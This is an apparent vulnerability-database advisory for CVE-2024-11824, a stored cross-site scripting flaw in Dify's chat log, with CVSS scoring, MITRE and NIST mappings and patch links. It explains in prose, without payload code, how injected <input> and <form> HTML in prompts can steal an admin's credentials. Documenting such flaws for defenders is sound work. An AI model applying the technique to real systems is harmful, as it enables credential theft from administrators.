CVE-2024-11824
Published: 20 March 2025
Summary
CVE-2024-11824 is a high-severity Cross-site Scripting (CWE-79) vulnerability in Langgenius Dify. Its CVSS base score is 7.6 (High).
Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked in the top 50.0% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).
Threat & Defense at a Glance
Threat & Defense Details
Mitigating Controls (NIST 800-53 r5)AI
SI-15 directly prevents stored XSS by filtering malicious HTML from chat log outputs before rendering in the admin's browser.
SI-10 validates prompts input to chat logs, blocking malicious HTML tags like <input> and <form> before storage.
SI-9 restricts chat log inputs to safe content, disallowing dangerous HTML tags that enable the stored XSS vulnerability.
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
Stored XSS in web app enables exploitation of public-facing application (T1190) and web portal capture to steal credentials/sensitive data from admin viewing tainted logs (T1056.003).
NVD Description
A stored cross-site scripting (XSS) vulnerability exists in langgenius/dify version latest, specifically in the chat log functionality. The vulnerability arises because certain HTML tags like <input> and <form> are not disallowed, allowing an attacker to inject malicious HTML into the…
more
log via prompts. When an admin views the log containing the malicious HTML, the attacker could steal the admin's credentials or sensitive information. This issue is fixed in version 0.12.1.
Deeper analysisAI
CVE-2024-11824 is a stored cross-site scripting (XSS) vulnerability in the langgenius/dify application, specifically within its chat log functionality. The flaw affects the latest version prior to the patch and occurs because certain HTML tags, such as <input> and <form>, are not properly disallowed. This allows attackers to inject malicious HTML into chat logs via prompts. The vulnerability carries a CVSS v3.1 base score of 7.6 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N) and maps to CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting').
A low-privileged user (PR:L) can exploit the vulnerability by submitting prompts containing malicious HTML, which becomes stored in the chat log. When an administrator views the tainted log, the injected script executes in the admin's browser context due to insufficient sanitization, enabling the attacker to steal the admin's credentials or other sensitive information. Exploitation requires network access and user interaction from the victim (UI:R), but achieves high confidentiality impact with changed scope (S:C).
The issue is addressed in Dify version 0.12.1, with the fix implemented in commit 55edd5047e6fcbc9bb56a4ea055fcce090f3eb5d available at https://github.com/langgenius/dify/commit/55edd5047e6fcbc9bb56a4ea055fcce090f3eb5d. Security teams should prioritize upgrading to the patched version. Further details, including the original report, are provided in the Huntr bounty advisory at https://huntr.com/bounties/72387deb-6e64-48ed-a8c3-b50d22a0970f.
Details
- CWE(s)